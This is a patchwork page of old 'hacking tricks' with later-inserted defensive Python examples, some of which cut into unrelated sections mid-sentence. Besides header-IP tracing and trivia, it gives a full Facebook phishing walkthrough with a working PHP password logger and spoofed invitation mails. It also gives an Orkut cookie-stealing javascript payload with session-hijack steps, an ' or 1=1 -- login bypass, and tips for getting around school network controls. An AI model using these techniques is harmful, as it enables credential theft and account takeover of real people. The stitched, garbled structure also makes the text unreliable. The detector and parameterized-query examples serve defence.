Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2007.03.12.15.11.46; Tue, 12 September 2007 15:11:47 -0800 (PST)
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST
Date: Tue, 12 September 2007 15:11:45 -0800 (PST)
From: Mr Jones
Subject: Hello
To: Mr Rakesh

In the example, headers are added to the message three times:

1. When Mr. Jones composes the email:
Date: Tue, 12 September 2007 15:11:45 -0800 (PST)
From: Mr Jones
Subject: Hello
To: Mr Rakesh
2. When the email is sent through the servers of Mr. Jones' email provider, mail.emailprovider.com:
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST

3. When the message transfers from Mr. Jones' email provider to Mr. Rakesh's Gmail account:
Delivered-To: MrRakesh@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September 2007 15:11:47 -0800 (PST)
Return-Path: MrJones@emailprovider.com
Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb; Tue, 12 September 2007 15:11:47 -0800 (PST)

Below is a description of each section of the email header (this part keeps the dates of the original Google help example, 29 Mar 2005, rather than the September 2007 dates in the listing above; the structure is the same):

Delivered-To: MrRakesh@gmail.com
The email address the message will be delivered to.

Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 29 Mar 2005 15:11:47 -0800 (PST)
The time the message reached Gmail's servers.

Return-Path: MrJones@emailprovider.com
The address from which the message was sent (the envelope sender, which need not match From:).

Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2005.03.29.15.11.46; Tue, 29 Mar 2005 15:11:47 -0800 (PST)
The message was received from mail.emailprovider.com by a Gmail server on March 29, 2005 at approximately 3 pm.

Message-ID: <20050329231145.62086.mail@mail.emailprovider.com>
A unique identifier assigned by mail.emailprovider.com to the message.

Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar 2005 15:11:45 PST
Mr. Jones used a web mail client to write the message, and it was received by the email servers of mail.emailprovider.com; the bracketed address is the client's IP as that server saw it.

Date: Tue, 29 Mar 2005 15:11:45 -0800 (PST)
From: Mr Jones
Subject: Hello
To: Mr Rakesh
The date, sender, subject and destination; Mr. Jones entered this information (except for the date) when he composed the email.

For the IP, look for "Received: from" followed by the IP within square brackets [ ], e.g.
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 ...
When there are several "Received: from" entries, take the last (bottom-most) one: each server prepends its own Received line, so the bottom one is the first hop, closest to the sender. Bear in mind that only the Received lines added by your own provider (the top ones) are trustworthy; everything below them was written by systems the sender controls and can be forged, and a webmail hop like the one above gives the address of the sender's browser session, not of a mail server.

Error in Notepad

Do the following:
1. Open Notepad
2. Type: bush hid the facts
3. Save it
4. Open it again
The text comes back as a row of Chinese characters. Reason: Notepad on Windows XP guesses the encoding of a file that has no byte-order mark with IsTextUnicode(), and a short line of ASCII words in this 4-3-3-5 letter pattern happens to look like UTF-16 to that heuristic, so the bytes are read two at a time. (The page calls this an "error"; it is the same bytes shown in the wrong encoding, and opening the file as ANSI gives the original text back. Newer Notepad versions detect the encoding differently and may not show it.)

Phishing WebPage

Creating a webpage that looks like another site is called phishing. With a phishing webpage you can make users believe it is the original website and enter their id and password. The walkthrough below reproduces the page's Facebook example; it shows how such pages are put together, which is also what you need to know to recognise one.

Step 1: Go to Facebook.com. Right-click on the white space of the front page and select "View Page Source".
Copy the code to Notepad.

Step 2: Now find (Ctrl+F) "action=" in that code. You will find something like this:
[Screenshot of the form tag omitted; the action= attribute is ringed in red and the method attribute circled]
Change the action= value to action="next.php". After that, change the method (the small red circle in the picture) to "get" instead of "post", or it will not work with the script below. Save the document as index.html.

Step 3: Now create "next.php" to store the password. Open Notepad and type the following (the page's copy began with "<php", which is not a PHP open tag; it must be "<?php"):

<?php
header("Location: http://www.Facebook.com/login.php");
$handle = fopen("pswrds.txt", "a");
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this file as "next.php". Because the form now submits with GET, the id and password travel in the query string, which is why $_GET is read here; it also means they land in the web server's access log and in the victim's browser history, not only in pswrds.txt.

Step 4: Open Notepad and save an empty file as "pswrds.txt". Now upload those three files (index.html, next.php, pswrds.txt) to any subdomain web hosting site. Note that the hosting service must support PHP. The page suggests 110mb.com, spam.com, justfree.com or 007sites.com, and using them through a proxy site such as http://flyproxy.com so that your IP address is hidden.

Step 5: Create a mail account with the Facebook keyword in it, like FACEBOOK@hotmail.com, Facebook@noreply.com, facebook_welcome@hotmail.com or facebook_friends@gmail.com.

Step 6: Copy an original Facebook friendship invitation and paste it into your mail. Remove the hyperlink from this http:/www.facebook.com/n/?reqs.php, mark the text and push the Add hyperlink button.

Updated, since everyone asks about this 6th step: you get a Facebook friendship invitation from Facebook when someone does "add as a friend", right? Just copy that mail and paste it into a compose window. In that content you can find the link http:/www.facebook.com/n/?reqs.php. Delete the link and create a new link with the same text, but pointing to your site.
[Screenshot omitted: the Add hyperlink button in the red circle]
Now write your phisher page URL in the hyperlink bar that appears after clicking the button, and click Add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php but lead to your phisher page.
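The whole trick in step 6 is an anchor whose visible text names one host while its href points at another. That mismatch is mechanically detectable, and the following Python script is an added example, not from the page, of the check a mail filter or a careful reader performs: parse every link in the message body, and flag any whose text itself looks like a URL or domain for a different site than the href goes to. The sample mail is constructed; the phisher host uses the reserved example.net domain.

```python
"""Flag links whose visible text claims one host but whose href goes elsewhere.

Added example, not the page's code. Sample mail below is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _host(text):
    """Host part of a URL or bare domain, lower-cased; None if there is none."""
    text = (text or "").strip()
    if not text:
        return None
    if "://" not in text:
        text = "http://" + text          # bare "facebook.com" in link text
    host = urlparse(text).hostname
    return host.lower() if host else None


def _same_site(claimed, actual):
    """True when the hosts are equal or one is a subdomain of the other."""
    return (claimed == actual
            or actual.endswith("." + claimed)
            or claimed.endswith("." + actual))


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) for every <a> in the document."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text)))
            self._href = None


def find_deceptive_links(html):
    """Return (visible text, href) pairs where the text names a different host.

    Only anchor text that itself looks like a URL or domain makes a claim;
    "get help" pointing anywhere is not deceptive, "www.facebook.com/..."
    pointing at another host is.
    """
    parser = _AnchorCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for href, text in parser.anchors:
        claimed, actual = _host(text), _host(href)
        if claimed and "." in claimed and actual and not _same_site(claimed, actual):
            hits.append((text.strip(), href))
    return hits


# Constructed sample: a copied "friend request" mail with one link rewritten,
# as step 6 describes. phish.example.net stands in for the phisher's host.
SAMPLE_MAIL = """
<p>Someone added you as a friend on Facebook.</p>
<p>To confirm, follow the link below:</p>
<a href="http://phish.example.net/index.html">http://www.facebook.com/n/?reqs.php</a>
<p>Or <a href="http://www.facebook.com/help">get help</a> |
<a href="https://m.facebook.com/">facebook.com</a></p>
"""

if __name__ == "__main__":
    for text, href in find_deceptive_links(SAMPLE_MAIL):
        print(f"text says {text!r} but href is {href!r}")
```

The subdomain allowance in _same_site is deliberate: "facebook.com" text pointing at m.facebook.com is normal, so only a change of registrable site is reported. A short-URL service in the href (the page's next note) defeats the text comparison, which is why a filter also expands or blocks redirectors.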
Note: to make users believe it, put your phishing web page URL behind one of the free short URL sites, like co.nr, co.cc or cz.cc; this makes users believe it is the correct URL. Don't use this method for hacking other people's accounts. This article is for educational purposes only.

Finding the IP address in Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab at the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display them:
   - Click on Options in the top-right corner
   - In the Mail Options page, click on Mail Display Settings
   - Under Message Headers, make sure the Advanced option is checked
   - Click OK
   - Go back to the mails and open that mail
5. You should see the email headers now.
6. You may copy the headers and use an IP address detection script to ease the process. Or, if you want to find the IP address manually, proceed to 7.
7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address.
   [Header sample omitted] In this case the IP address of the sender is [68.34.60.59].
8. If instead you find a header with Received: from followed by a Gmail proxy like this:
   [Header sample omitted] Look for Received: from followed by the IP address within square brackets [ ]. In this case, the IP address of the sender is [69.140.7.58].
9. Or else, if you have headers like this:
   [Header sample omitted] Look for Received: from followed by the IP address within square brackets [ ]. In this case, the IP address of the sender is [61.83.145.129] (spam mail).
10. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
11. Track the IP address of the sender.

X-Originating-IP was Hotmail's own record of the webmail client's address and is the most reliable item here when present, but it is only as good as the provider that added it, and some webmail providers (Gmail among them) do not expose the sender's client IP at all.

Finding the IP address in Yahoo! Mail
1. Log into your Yahoo! Mail with your username and password.
2. Click Inbox, or whichever folder you have stored the mail in.
3. Open the mail.
4. If you do not see the headers above the message, headers are not displayed. To display them:
   * Click Options in the top-right corner
   * On the Mail Options page, click General Preferences
   * Scroll down to Messages, where you have the Headers option
   * Make sure Show all headers on incoming messages is selected
   * Click Save
   * Go back to the mails and open the mail again
5. You should now see headers similar to this:
6. You may copy the headers and use an IP address detection script to ease the process, or, to find the IP address manually, proceed to step 7.
7. Look for Received: from followed by an IP address within square brackets [ ]. Here it is 202.65.138.109; that is the IP address of the sender. If there are many Received: from lines with an IP address, take the IP address in the last one (each mail server adds its Received: line above the existing ones, so the bottom-most line is the hop closest to the sender). If there are no Received: from lines with an IP address, take the first IP address in X-Originating-IP.
8. Track the IP address of the sender.

FM on your Google Talk

Hi guys 'n' gals, this is a trick I am presently using for listening to FM.
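The manual header search from the Hotmail and Yahoo! sections above, as an added example that is not part of the original page (the Google Talk trick continues below). It parses a constructed header block (the IP literals are the ones the page quotes; the hostnames are made up), applies the page's two rules (prefer X-Originating-IP, otherwise take the bottom-most Received: from that names a public address) and skips private relay addresses. The function names are mine:

```python
# Added example (not from the original page): the manual header search from
# the Hotmail and Yahoo! sections, as code. SAMPLE_HEADERS is constructed;
# the IP literals are the ones quoted on the page, the hostnames are made up.
import ipaddress
import re
from email import message_from_string

# Newest Received: line first, as a client shows them; the last one is the
# hop closest to the sender. Folded continuation lines are included on purpose.
SAMPLE_HEADERS = (
    "Received: from mx.example.net ([10.0.0.7]) by inbox.example.net;\n"
    "\tMon, 1 Jan 2007 10:00:04 +0000\n"
    "Received: from smtp.isp.example ([69.140.7.58]) by mx.example.net;\n"
    "\tMon, 1 Jan 2007 10:00:03 +0000\n"
    "Received: from [68.34.60.59] (helo=homepc) by smtp.isp.example;\n"
    "\tMon, 1 Jan 2007 10:00:02 +0000\n"
    "From: someone@example.com\n"
    "Subject: test\n"
)
SAMPLE_WITH_XOIP = "X-Originating-IP: [61.83.145.129]\n" + SAMPLE_HEADERS

_IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def public_ips(text):
    """Globally routable IPv4 literals in text, in order of appearance.
    Private/loopback/reserved addresses (internal relays) are dropped."""
    found = []
    for m in _IPV4.finditer(text):
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:          # e.g. 999.1.1.1 matched by the loose regex
            continue
        if ip.is_global:
            found.append(str(ip))
    return found


def hop_chain(raw_headers):
    """[(from-part, public IPs)] per Received: header, sender side first."""
    msg = message_from_string(raw_headers)
    chain = []
    for value in reversed(msg.get_all("Received", [])):
        # Only the "from ..." part names the previous hop; "by ..." is the receiver.
        from_part = " ".join(value.split(" by ", 1)[0].split())
        chain.append((from_part, public_ips(from_part)))
    return chain


def originating_ip(raw_headers):
    """The page's two rules: X-Originating-IP if present, else the public IP
    in the bottom-most Received: from, skipping hops with only private IPs."""
    msg = message_from_string(raw_headers)
    for value in msg.get_all("X-Originating-IP", []):
        ips = public_ips(value)
        if ips:
            return ips[0]
    for _, ips in hop_chain(raw_headers):
        if ips:
            return ips[0]
    return None


if __name__ == "__main__":
    print("with X-Originating-IP :", originating_ip(SAMPLE_WITH_XOIP))
    print("Received: only        :", originating_ip(SAMPLE_HEADERS))
    for host, ips in hop_chain(SAMPLE_HEADERS):
        print("  hop:", host, "->", ips or "no public IP")
```

One caveat the page leaves out: only the Received: lines added by servers you trust (your own provider's) are reliable. Anything below them was supplied by the sending side and can be forged, so the "last Received: from" rule is a heuristic, not proof.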
FM is on your GTalk now (Teen Taal 110, Hindi songs only). For this you need to follow these steps:
1) Add this ID to your GTalk: service@gtalk2voip.com
2) Then add: 110@radio.gtalk2voip.com
After completing these two steps, make a call to 110@radio.gtalk2voip.com and you will be connected directly to the Teen Taal FM radio station.

Folder Options missing

Many of us sometimes find Folder Options missing from Windows Explorer. Here's the solution. Open Run and type "gpedit.msc". Now go to User Configuration > Administrative Templates > Windows Components > Windows Explorer.
Click Windows Explorer; on the right-hand side you will find the option "Removes the Folder Options menu item from the Tools menu" (the third one). Check its state: if it is Not Configured, set it to Enabled by double-clicking it and applying, then set it back to Not Configured.

I hope you will find the option after restarting Windows.

Free webpages

.tk .coo.ir .synthasite.com .page.tl
--------------free servers.com------------
9f.com 7p.com 4t.com 8m.com 8m.net 8k.com s5.com itgo.com iwarp.com 4mg.com gq.nu faithweb.com tvheaven.com freehosting.net htmlplanet.com scriptmania.com

Hacking Orkut or Gmail with the help of cookies (stealing the victim's cookies)

By going through this post I hope you will understand how easy hacking has become with the help of cookies. In this post you'll learn cookie stealing and hacking an Orkut or Gmail account.

Procedure to hack Gmail or Orkut through Mozilla by stealing cookies:
1. Firstly you need to have Mozilla Firefox.
2. Download the cookie editor plugin for Mozilla Firefox.
3. You need two fake accounts to hack Orkut or Gmail: one Orkut account to receive the cookies and another Orkut account
for advertising your script. Well, it depends on your choice whether to have two Gmail (Orkut) accounts.
Cookie script:
javascript:nobody=replyForm;nobody.toUserId.value=xxxxxxx;nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit()
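What the script above actually reads, and the server-side cookie flag that blunts it, as an added example that is not part of the original page. The Set-Cookie lines are constructed for the demo, not captured from Orkut or Gmail, and the function names are mine:

```python
# Added example (not from the original page): what the Orkut "cookie script"
# reads, and why the HttpOnly cookie flag limits it. The Set-Cookie lines are
# constructed for the demo, not captured from Orkut or Gmail.

# The obfuscated version of the script on the page hides the property it reads
# behind String.fromCharCode(...). These are the codes it passes.
PAYLOAD_CODES = [100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101]


def decode_fromcharcode(codes):
    """Turn a String.fromCharCode(...) argument list back into text."""
    return "".join(chr(c) for c in codes)


def parse_set_cookie(line):
    """Minimal Set-Cookie parser: (name, value, {attribute: value or True})."""
    first, *attrs = [part.strip() for part in line.split(";")]
    name, _, value = first.partition("=")
    flags = {}
    for attr in attrs:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        flags[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), flags


def script_visible_cookies(set_cookie_lines):
    """Cookies a page script (and so the pasted javascript: URL) can read via
    document.cookie: everything the server did NOT mark HttpOnly."""
    visible = {}
    for line in set_cookie_lines:
        name, value, flags = parse_set_cookie(line)
        if flags.get("httponly"):
            continue
        visible[name] = value
    return visible


def document_cookie_string(set_cookie_lines):
    """The text document.cookie would return, i.e. what lands in the
    attacker's scrapbook when the victim runs the script."""
    pairs = script_visible_cookies(set_cookie_lines).items()
    return "; ".join("%s=%s" % kv for kv in pairs)


# Constructed: the same session cookie issued without and with HttpOnly.
WEAK_SERVER = [
    "orkut_state=ORKUTSESSION123; Path=/; Domain=.orkut.com",
    "lang=en; Path=/",
]
HARDENED_SERVER = [
    "orkut_state=ORKUTSESSION123; Path=/; Domain=.orkut.com; Secure; HttpOnly",
    "lang=en; Path=/",
]

if __name__ == "__main__":
    print("script reads:   ", decode_fromcharcode(PAYLOAD_CODES))
    print("weak server:    ", document_cookie_string(WEAK_SERVER))
    print("hardened server:", document_cookie_string(HARDENED_SERVER))
```

With HttpOnly on orkut_state the scrapbook receives only lang=en, so there is nothing to paste into the cookie editor. HttpOnly does not stop script running in the victim's session from acting on his behalf (the payload itself posts a scrap that way), so it is one control among several rather than a complete fix.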
How to use the cookie script?
1. Replace your number in "toUserId.value=xxxxxxxx". How to find your number: go to your album, right-click any photo > Properties; the file name (e.g. 55886645.jpg) is an eight-digit value. Replace xxxxxxxx in the script with that value. Your script will look like this:
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
(The String.fromCharCode(...) call just spells out document.cookie, so this version does the same as the first one, only obfuscated.)
2. Now send this cookie script to the victim and ask him to paste it into the address bar and press Enter.
3. You'll get his cookie in your scrapbook.
4. After getting the cookie, go to your Orkut home page, click the Tools tab and open the cookie editor plugin (Tools --> Cookie Editor).
5. Click Filter/Refresh and look for the 'orkut_state' cookie. Double-click it and replace the orkut_state value with your victim's; in the script, put your eight-digit number in place of (33444211). That's it, you're done. Log out of Orkut and log in again and you'll be on your victim's home page.

HACK to overcome the Rapidshare download limit

1. The first method, which I think all of us use, is simply disconnecting and reconnecting, but it consumes a lot of time.
2. This method involves a few simple DOS commands:
1. Click Start
2. Click Run
3. In the Run box type cmd and click OK
4. When the command prompt opens, type the following, pressing ENTER after each line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5. Erase your cookies in whatever browser you are using.
6. Try the Rapidshare download again.

Hack Websites

NOTE: works only on certain sites. If you have HTML and JavaScript knowledge then you can access password-protected websites. So you want to know how? Keep reading...
1. Open the website you want to hack. Provide a wrong username and password in its login form (e.g. Username: me and Password: ' or 1=1 --). An error will occur saying wrong username/password. Now be prepared; your experiment starts from here.
2. Right-click anywhere on that error page and go to View Source.
3. There you can see the HTML code with its JavaScript.
4. There you will find something like this....
5. Before you touch the login form, copy the URL of the site you are on.
6. Then delete the JavaScript that validates your information before it is sent to the server. (Do this very carefully; your success depends on how cleanly you remove the scripts that validate the account information.)
7. Then take a close look at the form tag and put the URL you copied in step 5 in its action attribute, so that your saved copy still submits to the real server. Also, if the maxlength of the password field is less than 11, increase it to 11 (the payload ' or 1=1 -- is exactly 11 characters).
8. Go to File => Save As and save it anywhere on your hard disk with the extension .html (e.g. c:\chan.html).
9. Reopen your target web page by double-clicking the 'chan.html' file you saved earlier.
10. You will see some changes in the page compared to the original one. Don't worry.
11. Provide any username (e.g. hacker) and the password ' or 1=1 --
Congratulations! You have cracked the website and entered the account of the first user stored in the server's database.
[Please read "_form" as "form", "_type" as "type" and "_input" as "input" above, without quotes.]
What makes this work is the server building its SQL query from the form fields by string concatenation; the JavaScript and the maxlength are only browser-side checks, which is why editing a saved copy of the page gets around them. The trick won't work on websites that use current techniques (parameterized queries) to protect their servers.
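The server side of the trick above, as an added example that is not part of the original page: a login query built by string concatenation beside the same query with bound parameters, run against a constructed SQLite users table (sample accounts and plaintext passwords for the demo only):

```python
# Added example (not from the original page): why the password ' or 1=1 --
# works, and the server-side fix. The users table and passwords are
# constructed sample data; real systems store password hashes, not text.
import sqlite3

PAYLOAD = "' or 1=1 --"   # exactly 11 characters, hence the maxlength step


def make_db():
    """In-memory users table with two sample accounts; admin is row 1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "Str0ngPass!"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation. With the payload the WHERE
    becomes  username='hacker' AND password='' or 1=1 --'  : the OR makes it
    true for every row, the -- comments out the stray quote, and fetchone()
    hands back the first user in the table. Returns the logged-in username."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the payload is compared as a literal
    password string and matches nobody. No browser-side check is involved."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload    ->", login_vulnerable(db, "hacker", PAYLOAD))
    print("parameterized login with payload ->", login_safe(db, "hacker", PAYLOAD))
    print("parameterized login, real creds  ->", login_safe(db, "bob", "hunter2"))
```

Removing the JavaScript and raising maxlength in the saved copy only matters because those checks run in the browser; the server never saw them. Against the parameterized version the same 11-character payload is just a password that matches no row.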
Still, you may find some websites where this trick works. Enjoy!
WARNING: We post this trick for your educational knowledge only. Don't misuse it, otherwise you will be in trouble. I take no responsibility for use of the above trick.

Hack Yahoo

I know a lot of you are wondering how to hack Yahoo. Well, the hacker group [POC] claims to have found an exploit. Me, being a close friend of the leader, I have posted what he sent me. Read it with care: the "method" consists of mailing your own password, in clear text, to an address somebody else controls. There is no password-retrieval mechanism at Yahoo behind it; this is the old password-fishing chain letter, and the only person who will read that mail is whoever owns the address. Here is the text:

Hey, I found this way to hack Yahoo, it's actually pretty easy, here is what you do:
1.) Write in the body of the letter the email address of the person you're hacking.
2.) Right below that, type in your Hotmail/Yahoo/whatever address you're using.
3.) Type the password to YOUR email address right below your email address in the letter. This is used for verification (yes, the mail provider does use your password to verify).
4.) Here is an example of what this should look like:
tahir@yahoo.com
Frank@yahoo.com
password to frank@yahoo.com
Joeschmo is the address you're hacking, frank is your email address, and then the password to frank@yahoo.com is your password for your email address. Now the final, and MOST IMPORTANT, step is to email all of this to pw_retrieved@yahoo.com, with this code pasted right below the password to your email address: adsflwro%$#AR11345. That code is what will trigger pw_retrieved@yahoo.com to send you back a message with the person's password. The notification email will be sent back within 48 hours of the time you sent it. So here is what it will all look like in the end:
tahir@yahoo.com
Frank@yahoo.com
Password to frank@yahoo.com
adsflwro%$#AR11345
And remember, send this to retrieve_pwd@yahoo.com

Hide Your Files In a JPEG

Well, did you know you could hide your files in a JPEG file? For this, you only need to download WinRAR. You just need a little knowledge of the Command Prompt and have
WinRAR installed. OK, let's begin...
1. Gather all the files you wish to hide in a folder anywhere on your PC (C:\hidden is recommended).
2. Now add those files to a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now look for a simple JPEG picture file (e.g. logo.jpg). Copy/paste that file into C:\hidden as well.
4. Now open the Command Prompt (go to Run and type 'cmd'). Make C:\hidden your working directory.
5. Now type: COPY /b logo.jpg + secret.rar output.jpg
Here logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file that contains both.
6. You will now see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR; it will show the hidden archive.
This works because image viewers stop reading at the JPEG's end-of-image marker and ignore whatever follows, while WinRAR scans the file for its own archive signature. The file size (larger than the picture alone) and the bytes after the end-of-image marker give the trick away to anyone who looks.

How to become Admin on your school network

This works for most schools. This tutorial is for the newbies out there wanting to "hack" their school. I'm going to start by saying that if you're going to hack the school, there's a high probability you'll get caught, and don't do anything dumb like deleting the network. It's lame, and you will get flamed for doing it. This hack only lets you hack the computer at a terminal connected to the network. If you want to remotely hack your school, ask Google.
Firstly, get a feel for the layout of the network. You can do this quickly via Start > Programs (right-click) > Explore. This gives you a map of the network, and you'll probably be able to edit and run files this way, but with DOS there are more options.
The basis of school hacking is getting to the command prompt, and 90% of schools will have blocked this. To get around this you can do two things:
1) Enter C:\windows\system32\cmd.exe into the IE address bar; however, this is very likely to be disabled.
2) Create a .bat file to open the Command Prompt.
You can do this by opening IE > View > Source. Once you have Notepad open, we're going to make a .BAT file. We want the BAT file to open the command prompt, so type CMD (without quotes), press ENTER, then save it as file.BAT. Now you should be able to open the Command Prompt by clicking on the file. If it fails to open, it is most likely that cmd.exe is disabled and you don't have the privileges to run it. So try using COMMAND instead. This does not have the same power as CMD, but is better than nothing.
Once we have it open, now comes the good bit. Before doing this, make sure you know a good lot of DOS commands. Here's a great list: www.computerhope.com/msdos
These are a few that you might like to try:
net send * "Hungry Hacker is cool"
shutdown -s -f -m \\NAME (rarely works)
These will only work if you have the privileges to use them. After you have access to the Command Prompt, to get at programs you are not allowed to use, DIR for shortcuts (.lnk). Then save them to a floppy disk. A shortcut is good because it is smaller and quicker to save than a whole EXE file.
There is also a good chance that the network will have RATs installed. A RAT (Remote Administration Tool) is used by admins to manage networks, a bit like a friendly trojan. This shouldn't be hard to find, and once you have found the EXE or LNK, save it to a floppy. Now you have control over every computer! You could use the RAT to use the admin's machine; the possibilities are endless!

How to improve your page search rank

Ever wondered why some sites rank higher in search engines than others do? Well, search engine databases hold billions of pages. They use a proprietary formula (or algorithm) to "score" the relevancy of websites for each search query. The highest ranking or "most relevant" websites for a specific query are listed first in the search results.
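Returning to the Hide Your Files In a JPEG section above: the COPY /b trick as bytes, plus a check that spots the result, as an added example that is not part of the original page. It uses a ZIP in place of secret.rar because Python's standard library has zipfile (the check does not depend on the archive format), and a constructed minimal JPEG in place of logo.jpg; the function names are mine:

```python
# Added example (not from the original page): the COPY /b trick above as
# bytes, and how to spot the result. A ZIP stands in for secret.rar because
# zipfile is in the standard library; the check itself is format-agnostic.
# The "logo.jpg" is a constructed minimal JPEG, not a real picture.
import io
import zipfile

SOI, EOI = b"\xff\xd8", b"\xff\xd9"       # JPEG start / end of image markers
ZIP_MAGIC = b"PK\x03\x04"
RAR_MAGIC = b"Rar!\x1a\x07"              # common prefix of RAR4 and RAR5 signatures


def minimal_jpeg():
    """SOI + one JFIF APP0 segment + EOI: valid marker structure, no picture."""
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"      # 14 bytes
    app0 = b"\xff\xe0" + (2 + len(jfif)).to_bytes(2, "big") + jfif
    return SOI + app0 + EOI


def make_archive(files):
    """Stand-in for secret.rar: a ZIP of {name: bytes} built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def copy_b(*parts):
    """What COPY /b logo.jpg + secret.rar output.jpg does: byte concatenation."""
    return b"".join(parts)


def jpeg_end_offset(data):
    """Offset just past the real EOI, found by walking the marker segments.
    Searching for the last FF D9 is not enough: the appended archive may contain it."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG")
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("expected marker at offset %d" % i)
        marker = data[i + 1]
        if marker == 0xFF:                      # fill byte before a marker
            i += 1
            continue
        if marker == 0xD9:                      # EOI
            return i + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            i += 2                               # stand-alone markers, no length
            continue
        if i + 4 > len(data):
            break
        i += 2 + int.from_bytes(data[i + 2:i + 4], "big")
        if marker == 0xDA:                      # SOS: skip entropy-coded data
            while i + 1 < len(data):
                nxt = data[i + 1]
                if data[i] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                i += 1
    raise ValueError("no EOI marker")


def trailing_data(data):
    """Bytes after EOI. Viewers stop at EOI, so a clean file has none."""
    return data[jpeg_end_offset(data):]


def classify(data):
    """'clean', or a short description of what is hidden after the image."""
    tail = trailing_data(data)
    if not tail:
        return "clean"
    if tail.startswith(ZIP_MAGIC):
        kind = "zip"
    elif tail.startswith(RAR_MAGIC):
        kind = "rar"
    else:
        kind = "unknown"
    return "%s appended (%d bytes)" % (kind, len(tail))


def extract_zip(tail):
    """Open the appended archive the way WinRAR does for output.jpg."""
    with zipfile.ZipFile(io.BytesIO(tail)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


if __name__ == "__main__":
    logo = minimal_jpeg()
    output = copy_b(logo, make_archive({"secret.txt": b"the hidden file"}))
    print("logo.jpg  :", classify(logo))
    print("output.jpg:", classify(output))
    print("recovered :", extract_zip(trailing_data(output)))
```

The detection point generalises: any bytes after the final end-of-image marker are not part of the picture, whatever they are. Walking the marker segments instead of searching for the last FF D9 matters because the appended archive can itself contain those two bytes.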
There are over 100 criteria used for ranking a page, and each carries a different "weight" of importance. Some criteria we can control, some we can manipulate, and others we can't do anything about. One of the most important criteria that we have control over is body content. The following "tweaks" can help your web pages rank better.
Headers, bullets etc.
Make the copy look like a document with header tags, bullets, bold, italics etc., focusing these features on the words that relate to the main topic.
Location, location, location
The closer the keywords or keyword phrases that best identify your topic are to the top of the document, the better. Try to have the keyword or keyword phrase appear in the opening sentence of the first paragraph and at least once in each paragraph.
Write good copy
Not only does it help satisfy the "related phrase" algorithm, it provides a sense of value to the reader, encouraging them to bookmark the site and return frequently.
Root words
Search engines identify root words that might be pluralized or tensed, so don't discount them in your copy.
Word count
250 to 300 words should be a minimum target per page if possible.
Title tag
Get the primary keywords or keyword phrases as they relate to your topic into your title tag. Title tags don't need to be long, but should highlight the main topic. Example: <title>Tripod web hosting. Free web hosting, e-mail, and blogs</title>
Harmony
